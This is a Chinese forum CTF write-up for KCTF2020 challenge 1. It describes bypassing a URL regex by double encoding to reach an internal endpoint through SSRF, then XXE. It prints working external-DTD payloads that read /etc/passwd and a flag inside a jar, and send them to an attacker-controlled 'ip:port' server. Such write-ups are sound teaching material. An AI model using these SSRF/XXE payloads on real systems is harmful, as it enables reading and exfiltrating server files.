-
-
[原创]KCTF2020秋季赛 第一题 至暗时刻 XXE解法 by xtgo
-
2020-11-18 01:32
3785
-
[原创]KCTF2020秋季赛 第一题 至暗时刻 XXE解法 by xtgo
Hello 大家好,我又来写Web题目的WriteUp了,抱着春季赛web题目=打卡题的心态我就来了,谁曾想到秋季赛的题目如此变态。从中午12点到晚上七点半就起来上过一次厕所,再没离开过电脑。要不是xtgo五虎将全军出击,不然这道题我就只能继续奋发图强(shan ku pao lu)了-.-
OK言归正传开始解题:
1、题目描述
一道Web题,访问链接:
http://121.36.145.157:8088/
利用技术绕过限制,获得flag.txt文件中的值。
2、初窥门径
首先访问域名发现,谁给kctf首页的图偷来了。。。
打开抓包工具看看刚好发现有个备注彩蛋
访问彩蛋 http://121.36.145.157:8088/loadConfig?url=x.xml ,可以看到接口有IP限制,目测接口的功能可能是加载服务器上的某些配置文件
遇到了IP限制当然要试一试XFF
结果就是这道题的考点不是XFF,header全加上也没用,还是提示" not allow ip"。
接着看下刚才访问首页下载图片的第二个接口
http://121.36.145.157:8088/getimage?url=https://bbs.pediy.com/upload/attach/202009/236762_Y76C73KQC7MG83G.jpg
看到url中的 ?url=http://xxx 一下就来了精神,配合刚才限制IP的接口,肯定是SSRF了,改一下跳转的url地址到某度,发现跳转地址有正则表达式限制,刚好也返回了过滤规则
分析下正则核心的三个条件
1、一级域名必须为看雪域名 pediy.com
2、二级域名可以填写除?$/三个符号的任意内容
3、path不做任何限制
3、整理思路
通过前一步的信息收集和题目理解,大致的攻击思路为
1、绕过getimage接口的过滤规则
2、绕过后通过SSRF访问loadConfig接口
3、通过loadConfig尝试访问服务器上flag.txt文件
4、发起进攻
首先将getimage接口中跳转URL的二级域名和path替换
发现提示无效的端口号,并没有提示正则错误,那就对整个域名进行两次转义替换(浏览器和服务器接到参数后都会默认进行一次decode,所以需要进行两次encode)
1 | http: / / 121.36 . 145.157 : 8088 / getimage?url = http: / / localhost % 253a8088 % 252floadConfig % 253furl % 253dx .xml.pediy.com / loadConfig?url = x.xml
|
成功绕过正则限制,出现异常回显
本以为今天的活动到此结束,谁知道这只是开始。。。
访问/flag.txt发现没有找到此文件,然后尝试读取/etc/passwd发现这个java接口只能接收xml document
怪不得前面的彩蛋提示是x.xml,原来是暗示传入一个xml文件,既然是xml那只能想到XXE漏洞。使用XXE则必须将注入的xml放在公网,SSRF跳转时可被访问到,先写个test.xml验证一下XXE确实存在
test.xml
1 2 3 4 5 | <!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe "Thinking" >]>
<foo>&xxe;< / foo>
|
公网测试
注入接口
http://121.36.145.157:8088/getimage?url=http://localhost%253a8088%252floadConfig%253furl%253dx.xml.pediy.com/loadConfig?url=http://ip:port/test.xml
发现报错回显不一样了,XXE看来有戏,构造访问文件的xml和dtd(涉及到ip:port的地方请自行替换成自己的服务器地址)
xxe.xml
1 2 3 4 5 6 | <?xml version = "1.0" ?>
<!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://ip:port/xxe.dtd" >
% ext;
]>
<message>< / message>
|
xxe.dtd
1 2 3 4 | <!ENTITY % file SYSTEM "file:///etc/passwd" >
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file://ip:port/%file;'>" >
% eval ;
% error;
|
在dtd中先访问/etc/passwd ,成功获取到passwd的文本内容
接下来是最心塞的一步,寻找flag.txt,大家一起找了几个小时。不过最终功夫不费有心人,通过/proc/self/maps文件找到java程序的调用记录,成功获取到jar包存储的路径和文件名 /home/vip-demo-0.0.1-SNAPSHOT.jar
最后一步通过jar:和file:协议访问jar包中的flag.txt
参考XXE注入
xxe.dtd
1 2 3 4 | <!ENTITY % file SYSTEM "jar:file:///home/vip-demo-0.0.1-SNAPSHOT.jar!/BOOT-INF/classes/flag.txt" >
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file://ip:port/%file;'>" >
% eval ;
% error;
|
成功在异常中获取flag!congratulations!
1 | 2020.11 . 17 | write by xtgo
|
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
最后于 2020-11-23 11:06
被xjklewh编辑
,原因: update